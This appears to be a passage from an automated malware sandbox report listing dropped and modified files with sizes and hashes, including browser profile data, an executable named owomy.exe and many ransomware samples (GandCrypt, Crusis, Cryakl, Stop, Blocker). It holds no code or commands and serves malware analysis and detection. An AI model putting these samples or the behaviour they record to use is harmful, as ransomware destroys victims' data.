                                                                                                                                                                                                                                                                                                      54cb446f628b2ea4a5bce5769910512e

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\turboapp_db.json
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      9ba051dba822d5a9614b02c5ebf6f329

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      d9914aee1e182b096cf4c9796d57f60cb672ce4b

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      facff245e6bb5b7a407c9325b7a65a31fcf3741fe4fe1c8366b7c7aa16e8757e

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      06bb27fb42c43f4b56706846f181e54c016da967b90f9384bcc22ec3cf628bc2cf282cb9c9486ffb4bf88b11e38ffb764bff52079e53c88e3d365640174af687

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\turboapp_db.json
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      3aa33744090441070d55b982e4554828

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      a451d4b12bebb2e15a9bb6c03a1b2276655020f5

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      fc2e2bf601fbe3152ef8d7dbf364735355135f6fbab75934593aa74bc8edd546

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      b0bb3f7d6f7714ef51b41428008d9d2021115aa923577f448b08547643d91f31000bd477f11455402298901ced6b735c7056786a953ed1b295fc05415c358feb

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\turboapp_db.json~RFe5ad737.TMP
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      24KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      4f36cc6c7d3524cdc5d1f0965592a173

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      bef5f21c3f4cb0afeaff1ca761257a1b4a1ff606

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      5166c4116700e81c177b62c633e3bd7596665ac6cee5031931ed5b27eb1f4ae6

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      c02d970509c46670b78c78ebb426c879c7e6e7b6a24980756bd0859412661e0cbd6d4986579fd69ca7221c7c0392cd86e35c05b99d731da3c923c99bc83697f1

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\GrShaderCache\data_0
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      cf89d16bb9107c631daabf0c0ee58efb

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\GrShaderCache\data_1
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      264KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      d0d388f3865d0523e451d6ba0be34cc4

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      8571c6a52aacc2747c048e3419e5657b74612995

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\GrShaderCache\data_2
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      0962291d6d367570bee5454721c17e11

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      59d10a893ef321a706a9255176761366115bedcb

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\GrShaderCache\data_3
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      41876349cb12d6db992f1309f22df3f0

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      5cf26b3420fc0302cd0a71e8d029739b8765be27

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Local State
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      231KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      0ef0bdcc45270fc308b32393dba14c5f

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      dd6896cdf7249699754ab68e3a0f2eaee30ae360

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      22ec44a92c1d4f4af683cd105d746d481408c6590b1d1c4a8d85fe404baf6612

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      20781f2c6d454510177cbf8bed7c6d0c9c0e77578c04731c34ad517d1d237d0c4bb30fbdefd8b207675fe8341133ae08f2d1c87b6ae1fcb3cd8c40ec6001aee4

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      162KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      8e2426b9c1cf9d93cb3207f5a072e51d

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      4b4f051ad3e1ac398bfb6fa10d6ff5d3aab3e2df

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      2994ae7bbd05522d5d6b5596075c6b46ca22b73963375859f873c24a95e32b94

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      9c18e2224e4a250be61ab1454343f6446122eed1511d21353749102710e3b54bb9ad4907f002f9ea04b5dd30e5bac401d1b99e4e66e2acb6eb9077b0cb68c354

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      14KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      2257fa8cef64a74c33655bd5f74ef5e5

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      b9f8baf96166f99cb1983563e632e6e69984ad5c

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      ead48b70e048de6ccca219a229ca90b49a9d1b9c14bf3a7c5eaad544294fcfd3

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      7792be9b935a46a923e97bb76b76957070e116dcc4cb6fcd8b883c2d6f142285ebc9fd26cdf29bd19c8bdff412487f586abaa1724332b613e71afa45d7f3e4f9

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\places.sqlite-20241104181659.403177.backup
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      68KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      314cb7ffb31e3cc676847e03108378ba

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      3667d2ade77624e79d9efa08a2f1d33104ac6343

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      b6d278384a3684409a2a86f03e4f52869818ce7dd8b5779876960353f7d35dc1

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      dc795fa35ea214843a781ee2b2ef551b91b6841a799bef2c6fb1907d90f6c114071a951ebb7b2b30e81d52b594d447a26ab12ddb57c331e854577d11e5febef5

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Ogro\owomy.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      67KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      aeb3c700c842d4edda4221d624fc6ad3

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      53165437cea15383b9fcdb6b92f330b70aa525f6

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      621a43eb21d6b5d8620cd6910bcf36667d21ef165cb68000f05dfcabd4101c97

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      278756bf77b67e82e0f6dfb8fdb9b904663607324866b1095d90ead0a8aa789280947a77da56f370b9a3dce2b48505a27ac5104285493760df5cc24bfa928568

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      46cf6a1b60e8ed02274504ae535e181c

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      21f7f68b81ee7642151b4ac228955c79c7670c9c

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      dda4c5bdfbe120e3a990dd2bfc2e5259bac84eb7b3cf28fc1154dddb86b2ff2a

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      df9da8225e7a80c114a0922c45657b39a1b6bd27ecfc6648abb697c0b44432e36c5cd70b45004c71f7f34f3333ca35d358eebce74c29a2536ac717246917aa5f

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks-20241104181659.762520.backup
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      3adec702d4472e3252ca8b58af62247c

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      35d1d2f90b80dca80ad398f411c93fe8aef07435

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      2b167248e8136c4d45c2c46e2bff6fb5e5137dd4dfdccde998599be2df2e9335

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      7562e093d16ee6305c1bb143a3f5d60dafe8b5de74952709abc68a0c353b65416bf78b1fa1a6720331615898848c1464a7758c5dfe78f8098f77fbfa924784c0

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\BookmarksExtras
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      18KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      6f9af15df9d5c1efefbdedbdea91914b

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      bdadf5e75e3e2b55f6b1c7301d2a2cc67c4d48dc

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      3070da1613b9727edf85a592162befcf1a9044d9ccd55e6111bd4b3ac415fde2

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      adf3b77863b8adbce07bda9705965be78e7ec12b0f8e0a7a88f22bd9863a03dfabc6be37fd674ed4f7ac2588e4d884f3463bc44684dfd59734c6bd2a9e53a0c1

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Preferences
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      318B

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      e008c3412c4d4b93ac92078866c069eb

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      ecc09219949f386152bb292c18cd4ee97bbbf2a7

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      d59d2f5ac6739824d9cb312df98ba6879b2d469ba69f417010d6ed9acf4bbe74

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      149fe0a322e5bc36d613a7ccc2ce31f9d6888ee8d7f84c31ee75d3aa1a8b96e5b6215fc5abfd066009cfddb22681affa15ce80ce005d14df56c03b87c9b6e8f9

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.MSIL.Blocker.gen-13dd892746ffb4ad28fdd6443b16d7b4158a5bd441ac2e9b6e8184cf863f4bd0.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      672KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      3684cc7f2110a5bd71e38ffdda2e644e

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      4e8666cc11ea1f678d7f24e80741e508a2d07934

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      13dd892746ffb4ad28fdd6443b16d7b4158a5bd441ac2e9b6e8184cf863f4bd0

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      e4d3162766491af4cb93e99b84c8966784e3f13630f2fd56b3da8c45c74036deab249c45bedef20d048b9dacfb1792e53ba071247b0befe440f1e2abe577f433

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.Win32.Blocker.vho-b69caaef596715a5ead5aac8af29f95d18454eef8081f3931fa7e9d3663a0c19.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      68KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      b9c10800e4b2245306057caa1dac0704

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      dfc1723db08203c810f4c3275f8b4b8f74e49c23

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      b69caaef596715a5ead5aac8af29f95d18454eef8081f3931fa7e9d3663a0c19

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      72db923625f429479817b61d49f6d930e8c2548c8d1b02e22897fd9d106e8ecfe3bb8be88465f372553312cd9a5b5d235dbf84801ffc09e4ff9092f66d43a2ea

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.Win32.Encoder.gen-39deb2f02fee04a430cff446b35b0984a66b563552775eb1309d35acca3a209f.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      201KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      cb20cd6ecda6c480e0be79194e914cc2

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      3112b90cdaef9592426a831a2c0962cbb8762e82

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      39deb2f02fee04a430cff446b35b0984a66b563552775eb1309d35acca3a209f

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      3c4febc9d639db2eb4184a6c9efc4e6237cd637bc7851beaaff8f6578b457ea5ba88823fbd5a10c92c790d72647313246fd34cc964bfe36f2404d2ab8d48b920

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.Win32.Generic-3b73775e3999fa2a73354e2f9073ae52c61f2aa4ed348b0889f3c85653cf1145.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      184KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      5e2ed2f916fc4291ffd2f58334a966bc

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      2f887e570c13f5dc204230a05774adba6ad3004c

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      3b73775e3999fa2a73354e2f9073ae52c61f2aa4ed348b0889f3c85653cf1145

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      0a55713bc54efbad793515b7c29b97a58fcd3daac9ead934028878b8f135f63b50e3cc4c1073703f0ad6202137f0ac403da997ce9bf84dc0ed6a56fef87bf671

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\HEUR-Trojan-Ransom.Win32.Stop.vho-8a4214d3c69df6a10e057fe1071e6bbb2ebd463bf3e73b9c66c3cbf3f31839b2.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      771KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      5cdd19ef5b649d28c7532156184809f7

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      bf148be9b8b322f73aadbcdaf486ce55864838a5

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      8a4214d3c69df6a10e057fe1071e6bbb2ebd463bf3e73b9c66c3cbf3f31839b2

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      33e2ad69f3841e12c92d3b4f04602cb5621ab9266c5da596bbce35f844182a906407183c9fbcff9c85dcb145c4edfc96148cb1bda53682f2d8e85ec34dfec7a9

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\Trojan-Ransom.MSIL.Agent.fqlx-349508bdc31aa72e48eaf47543c0f007126df7e2691a22d2d37ac70e1cd00c62.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      471KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      36419d62824b6e547c978cca76e4c00c

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      64b7a1a79bbe14463ac43e74add7c293c7c9ec5a

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      349508bdc31aa72e48eaf47543c0f007126df7e2691a22d2d37ac70e1cd00c62

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      48bf6ba22e145a6a51b1b8de09e4773578c86e94c753c990f0addc24e5259a523d8dc6079741cf8c4dd2225bdad5fae95e4a60964b225493ed0d59a84c3415cc

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\Trojan-Ransom.MSIL.Blocker.bn-e806dd8fe344e38a00a76b52b28476b7e3e25147b5fc7eed01b8f0ab86bd7bf5.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      571KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      8bdf38045433548a4b35d5b61a42a965

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      a32fff2685d3c4ec12799e28873d48187b8c100d

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      e806dd8fe344e38a00a76b52b28476b7e3e25147b5fc7eed01b8f0ab86bd7bf5

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      8c3fa2cc39788889f30f7f25d47f3ccf423b6e2a1fd67350d1f6151e8cf29715a8bc05817e8b31f40504b965e9bf370ea267be4aa3db6405ad2c3852b005fe52

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Blocker.mbrj-ec63c5041f96cac25d9ea2e078b9103afbf9fa760d1cf94107ad9cada121e3da.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1.2MB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      4a888e4f76a7fcb38d17dd458c009b95

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      740f9fa33648f7fbfedbac900de585c40d1ddb12

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      ec63c5041f96cac25d9ea2e078b9103afbf9fa760d1cf94107ad9cada121e3da

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      6dfe0dbe8479bae5425372cae113ced6222b5727afb336dc0cd0553a8898d376407c4e7d2ae995620d159638023852b56c54650f73fd5f071286a354674482b8

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Blocker.mdly-80b7fc97d015e313a0fad37f406f62e45a55a6ae574aae41d8095e42a90908dd.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      1.7MB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      766673402f399361bd8583b2e9bec789

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      fafe34716e35c57d3ab470b5239e512abd84c439

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      80b7fc97d015e313a0fad37f406f62e45a55a6ae574aae41d8095e42a90908dd

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      a9976daf291abc83c9eda50ac64384e42094c5d6673a7045109b72c7e1b384d2bebbc7a9e3cbb19da505571f2073291ee56c5a663e8a011102889f8af44458b2

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Crusis.drv-425e4f08a31dc3c68a1a3a2518322531a4b9043ce66a683184d4d0b6e0ae6913.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      867KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      611951ee8ab1f66bace29d81d40fdeb3

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      7769f65c969bcc8f6e677b42fcbd9d8516117437

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      425e4f08a31dc3c68a1a3a2518322531a4b9043ce66a683184d4d0b6e0ae6913

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      a62c7b2b44084bc284ae5b57e27b2ef9375832871dcfb6863a78ebfb4a474457c5693a94566e2b37fab8e91f757a868a9615e6f09c15762934726c840d36113e

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Crusis.to-482e5b77bf6c0c2953e2e8a456a3a072a3f9d5cb35e822e493d062d2372a1fc0.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      92KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      7bf2f1187fb0f74893de4d4f54591af4

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      42446f82700f819901a2e8b302c7eb32e1f99d5a

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      482e5b77bf6c0c2953e2e8a456a3a072a3f9d5cb35e822e493d062d2372a1fc0

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      f77d1ff98988a9d319a2bb17511a002f437029de422856f8f519376a70316e10a9594dccd6a5fed5f7fdf8d65e61d0bb5f6385b6a660b28b6c13958e6b24a814

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.Cryakl.aiv-e49778d20a2f9b1f8b00ddd24b6bcee81af381ed02cfe0a3c9ab3111cda5f573.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      329KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      adb5c262ca4f95fee36ae4b9b5d41d45

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      cdbe420609fec04ddf3d74297fc2320b6a8a898e

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      e49778d20a2f9b1f8b00ddd24b6bcee81af381ed02cfe0a3c9ab3111cda5f573

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      dad3541217a7f1fde669441a3f987794ee58ae44e7899d7ed5ebdf59e8174e2924441ea8474701908071df74479a4f928b673c2d9086c67078a2a861b61ba754

                                                                                                                                                                                                                                                                                                      Download Submit

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00377\Trojan-Ransom.Win32.GandCrypt.jcc-f60d7ae9ad4ed077cebee430314ee63c04cbfd97aa2277db07ca144de5905ef5.exe
                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                      69KB

                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      4d9a6546af5b6ba5b8f7a9a16b628745

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      ad4a818a80da67134050176f2ed049e4ed7db7ef

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      f60d7ae9ad4ed077cebee430314ee63c04cbfd97aa2277db07ca144de5905ef5

                                                                                                                                                                                                                                                                                                      SHA512

